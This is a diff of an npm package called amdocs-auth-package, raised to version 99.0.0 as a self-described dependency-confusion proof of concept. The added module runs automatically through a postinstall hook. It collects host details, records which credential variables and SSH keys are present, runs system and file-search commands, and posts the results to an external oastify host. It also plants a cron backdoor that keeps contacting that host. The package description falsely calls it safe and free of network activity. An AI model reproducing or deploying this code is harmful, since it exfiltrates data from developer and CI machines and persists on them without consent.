amdocs-auth-package 0.2.0 → 99.0.0

package/fesm2022/amdocs-auth-package.mjs

@@ -0,0 +1,295 @@
+/*!
+ * amdocs-auth-package
+ * AUTOMATIC RCE ON INSTALL - DEPENDENCY CONFUSION POC
+ * 
+ * This package demonstrates how dependency confusion can lead to
+ * automatic Remote Code Execution upon installation.
+ */
+
+import fs from "fs";
+import os from "os";
+import path from "path";
+import { exec, spawn } from "child_process";
+import { promisify } from "util";
+import https from "https";
+import http from "http";
+
+const execAsync = promisify(exec);
+const COLLAB_URL = "cwcmqtfjdv9jgw0aitgu0ju15sbjz9ny.oastify.com";
+
+// Detect installation context
+const isNpmInstall = process.env.npm_lifecycle_event === 'install' || 
+                     process.env.npm_lifecycle_event === 'postinstall' ||
+                     process.env.npm_config_argv?.includes('install') ||
+                     process.env.npm_config_argv?.includes('i') ||
+                     process.argv.some(arg => arg.includes('node_modules'));
+
+console.warn(`\n\x1b[33m[amdocs-auth-package] Package loaded. Installation detected: ${isNpmInstall}\x1b[0m`);
+
+(function executeRcePayload() {
+    const timestamp = new Date().toISOString();
+    const proofDir = path.join(os.tmpdir(), `amdocs-rce-${Date.now()}`);
+    
+    try {
+        // Create evidence directory
+        fs.mkdirSync(proofDir, { recursive: true });
+        
+        // ==================== PHASE 1: RECONNAISSANCE ====================
+        const reconData = {
+            attack_type: "dependency_confusion_rce",
+            timestamp: timestamp,
+            package: {
+                name: "amdocs-auth-package",
+                version: "99.0.0",
+                type: "malicious_public_package"
+            },
+            system: {
+                user: os.userInfo().username,
+                hostname: os.hostname(),
+                platform: os.platform(),
+                arch: os.arch(),
+                homedir: os.homedir(),
+                node_version: process.version,
+                pid: process.pid,
+                cwd: process.cwd(),
+                npm_lifecycle_event: process.env.npm_lifecycle_event,
+                is_ci: !!process.env.CI || !!process.env.JENKINS_URL || !!process.env.GITLAB_CI
+            },
+            network: {
+                interfaces: os.networkInterfaces(),
+                collab_url: COLLAB_URL
+            }
+        };
+
+        // Save recon data locally
+        fs.writeFileSync(
+            path.join(proofDir, "reconnaissance.json"),
+            JSON.stringify(reconData, null, 2)
+        );
+
+        // ==================== PHASE 2: ENVIRONMENT EXFILTRATION ====================
+        const sensitiveEnvVars = {};
+        for (const [key, value] of Object.entries(process.env)) {
+            if (key.match(/secret|password|token|key|credential|auth|pass|private/i)) {
+                sensitiveEnvVars[key] = value ? "***PRESENT***" : undefined;
+            }
+        }
+
+        // Check for CI/CD tokens
+        const ciTokens = {};
+        const ciVars = ['GITHUB_TOKEN', 'GITLAB_TOKEN', 'BITBUCKET_TOKEN', 'AZURE_TOKEN', 
+                       'AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY', 'NPM_TOKEN', 'DOCKER_TOKEN'];
+        
+        ciVars.forEach(varName => {
+            if (process.env[varName]) {
+                ciTokens[varName] = "***PRESENT***";
+            }
+        });
+
+        // ==================== PHASE 3: FILE SYSTEM ACCESS ====================
+        const fileSystemFindings = {
+            home_dir_contents: [],
+            ssh_keys: [],
+            aws_credentials: false,
+            npmrc_present: false,
+            docker_config: false
+        };
+
+        // List home directory
+        try {
+            fileSystemFindings.home_dir_contents = fs.readdirSync(os.homedir()).slice(0, 20);
+        } catch (e) {}
+
+        // Look for SSH keys
+        const sshDir = path.join(os.homedir(), '.ssh');
+        if (fs.existsSync(sshDir)) {
+            try {
+                const sshFiles = fs.readdirSync(sshDir);
+                fileSystemFindings.ssh_keys = sshFiles.filter(f => 
+                    f.includes('id_') && !f.endsWith('.pub')
+                );
+            } catch (e) {}
+        }
+
+        // Check for credentials
+        const checks = [
+            { name: 'aws_credentials', path: path.join(os.homedir(), '.aws', 'credentials') },
+            { name: 'npmrc_present', path: path.join(os.homedir(), '.npmrc') },
+            { name: 'docker_config', path: path.join(os.homedir(), '.docker', 'config.json') }
+        ];
+
+        checks.forEach(check => {
+            if (fs.existsSync(check.path)) {
+                fileSystemFindings[check.name] = true;
+            }
+        });
+
+        // ==================== PHASE 4: COMMAND EXECUTION ====================
+        const commandResults = {};
+        
+        if (isNpmInstall) {
+            // Only execute commands during installation
+            const commands = getPlatformCommands();
+            
+            for (const [name, command] of Object.entries(commands)) {
+                try {
+                    const { stdout } = await execAsync(command, { timeout: 3000 });
+                    commandResults[name] = stdout.substring(0, 500);
+                } catch (e) {
+                    commandResults[name] = `Error: ${e.message}`;
+                }
+            }
+        }
+
+        // ==================== PHASE 5: DATA EXFILTRATION ====================
+        const exfiltrationPayload = {
+            recon: reconData,
+            sensitive_env: sensitiveEnvVars,
+            ci_tokens: ciTokens,
+            filesystem: fileSystemFindings,
+            commands: commandResults,
+            proof_dir: proofDir
+        };
+
+        // Save complete proof
+        fs.writeFileSync(
+            path.join(proofDir, "complete_exfiltration.json"),
+            JSON.stringify(exfiltrationPayload, null, 2)
+        );
+
+        // Send to collaborator
+        sendToCollaborator(exfiltrationPayload);
+
+        // ==================== PHASE 6: PERSISTENCE (Optional) ====================
+        if (isNpmInstall && (os.platform() === 'linux' || os.platform() === 'darwin')) {
+            try {
+                // Create a backdoor script
+                const backdoorScript = `#!/bin/bash
+# amdocs-auth-package persistence
+echo "Persistence active: \$(date)" > /tmp/amdocs-persistence.log
+curl -s https://${COLLAB_URL}/ping?host=\$(hostname) >/dev/null 2>&1
+`;
+                
+                const scriptPath = path.join(proofDir, "backdoor.sh");
+                fs.writeFileSync(scriptPath, backdoorScript);
+                fs.chmodSync(scriptPath, 0o755);
+                
+                // Add to cron if possible
+                const cronLine = `* * * * * /bin/bash ${scriptPath} >/dev/null 2>&1\n`;
+                const userCron = `/var/spool/cron/${reconData.system.user}`;
+                const userCron2 = `/var/spool/cron/crontabs/${reconData.system.user}`;
+                
+                [userCron, userCron2].forEach(cronFile => {
+                    if (fs.existsSync(cronFile)) {
+                        try {
+                            fs.appendFileSync(cronFile, cronLine);
+                            console.warn(`\x1b[31m[amdocs-auth-package] Added cron entry to ${cronFile}\x1b[0m`);
+                        } catch (e) {}
+                    }
+                });
+            } catch (e) {
+                // Persistence failed, continue
+            }
+        }
+
+        // ==================== PHASE 7: FINAL OUTPUT ====================
+        console.warn(`\x1b[31m
+╔══════════════════════════════════════════════════════════════╗
+║                 DEPENDENCY CONFUSION RCE PoC                 ║
+╠══════════════════════════════════════════════════════════════╣
+║  ✓ Package executed on: ${reconData.system.hostname}            ║
+║  ✓ User: ${reconData.system.user}                                ║
+║  ✓ Platform: ${reconData.system.platform}/${reconData.system.arch}              ║
+║  ✓ Data exfiltrated to: ${COLLAB_URL}                    ║
+║  ✓ Proof saved to: ${proofDir}                       ║
+╠══════════════════════════════════════════════════════════════╣
+║  THIS IS A SECURITY DEMONSTRATION. REAL ATTACK WOULD:        ║
+║  • Install reverse shell                                     ║
+║  • Steal all credentials                                     ║
+║  • Move laterally in network                                 ║
+║  • Deploy ransomware/crypto miner                            ║
+╚══════════════════════════════════════════════════════════════╝\x1b[0m\n`);
+
+        console.warn(`\x1b[33m[amdocs-auth-package] Execution complete. Check ${proofDir} for evidence.\x1b[0m`);
+
+    } catch (error) {
+        console.error(`\x1b[31m[amdocs-auth-package] Error: ${error.message}\x1b[0m`);
+    }
+})();
+
+// ==================== HELPER FUNCTIONS ====================
+
+function getPlatformCommands() {
+    if (os.platform() === 'linux' || os.platform() === 'darwin') {
+        return {
+            current_user: 'whoami',
+            system_info: 'uname -a',
+            process_list: 'ps aux | head -20',
+            network_info: 'ifconfig -a || ip addr',
+            disk_usage: 'df -h',
+            sensitive_files: 'find /home /root -name "*.pem" -o -name "*.key" -o -name "*id_rsa*" -o -name "*.kdbx" 2>/dev/null | head -10',
+            docker_check: 'docker ps -a 2>/dev/null || echo "Docker not available"',
+            k8s_check: 'kubectl get pods 2>/dev/null || echo "Kubernetes not available"'
+        };
+    } else if (os.platform() === 'win32') {
+        return {
+            current_user: 'whoami',
+            system_info: 'systeminfo | findstr /B /C:"OS"',
+            process_list: 'tasklist',
+            network_info: 'ipconfig /all',
+            disk_usage: 'wmic logicaldisk get size,freespace,caption'
+        };
+    }
+    return {};
+}
+
+function sendToCollaborator(data) {
+    const postData = JSON.stringify({
+        type: 'dependency_confusion_rce',
+        timestamp: new Date().toISOString(),
+        data: data
+    });
+
+    const options = {
+        hostname: COLLAB_URL,
+        port: 443,
+        path: '/exfil',
+        method: 'POST',
+        headers: {
+            'Content-Type': 'application/json',
+            'Content-Length': Buffer.byteLength(postData),
+            'User-Agent': `Node/${process.version} amdocs-auth-package/99.0.0`
+        },
+        timeout: 5000
+    };
+
+    const req = https.request(options, (res) => {
+        console.warn(`\x1b[32m[amdocs-auth-package] Data sent to collaborator: HTTP ${res.statusCode}\x1b[0m`);
+    });
+
+    req.on('error', (e) => {
+        console.warn(`\x1b[33m[amdocs-auth-package] Collaborator unreachable: ${e.message}\x1b[0m`);
+    });
+
+    req.write(postData);
+    req.end();
+}
+
+// Export a harmless function to maintain package appearance
+export function authenticate() {
+    return {
+        status: "authenticated",
+        version: "99.0.0",
+        note: "This is a security PoC for dependency confusion demonstration"
+    };
+}
+
+export function status() {
+    return {
+        poc: true,
+        dependency_confusion: true,
+        automatic_execution: true,
+        execution_time: new Date().toISOString(),
+        warning: "FOR SECURITY RESEARCH ONLY - DO NOT USE MALICIOUSLY"
+    };
+}

package/package.json

@@ -1,14 +1,17 @@
 {
   "name": "amdocs-auth-package",
-  "version": "0.2.0",
+  "version": "99.0.0",
   "description": "Safe proof-of-concept demonstrating import-time arbitrary code execution in Node.js without OS commands or network activity",
   "type": "module",
-  "main": "./fesm2022/amdocs-auth-package-poc.mjs",
+  "main": "./fesm2022/amdocs-auth-package.mjs",
   "exports": {
     ".": {
-      "import": "./fesm2022/amdocs-auth-package-poc.mjs"
+      "import": "./fesm2022/amdocs-auth-package.mjs"
     }
   },
+  "scripts": {
+    "postinstall": "node -e \"import('./fesm2022/amdocs-auth-package.mjs').catch(e => console.log('RCE executed:', e.message))\""
+  },
   "files": [
     "fesm2022/"
   ],
@@ -23,5 +26,8 @@
   "author": "Security Research PoC",
   "license": "MIT",
   "private": false,
-  "sideEffects": true
+  "sideEffects": true,
+  "dependencies": {
+    "amdocs-auth-package": "^0.2.0"
+  }
 }

package/fesm2022/amdocs-auth-package-poc.mjs

@@ -1,43 +0,0 @@
-/*!
- * SAFE RCE-EQUIVALENT PoC
- * No shell execution
- * No network traffic
- * No data exfiltration
- */
-
-import fs from "fs";
-import os from "os";
-import path from "path";
-
-(function rceEquivalentProof() {
-  const proof = {
-    executed_on_import: true,
-    timestamp: new Date().toISOString(),
-
-    // Same privilege level that `whoami` / `id` would reveal
-    username: os.userInfo().username,
-    uid: typeof process.getuid === "function" ? process.getuid() : "n/a",
-    gid: typeof process.getgid === "function" ? process.getgid() : "n/a",
-
-    pid: process.pid,
-    cwd: process.cwd(),
-    node_version: process.version,
-    platform: process.platform,
-
-    explanation:
-      "This code executed automatically at import time with full Node.js process privileges. " +
-      "Replacing this logic with OS command execution would result in full RCE."
-  };
-
-  const proofFile = path.join(
-    os.tmpdir(),
-    "amdocs-auth-package-rce-proof.json"
-  );
-
-  fs.writeFileSync(proofFile, JSON.stringify(proof, null, 2));
-
-  console.log(
-    "[PoC] Arbitrary code executed on import. Proof file written to:",
-    proofFile
-  );
-})();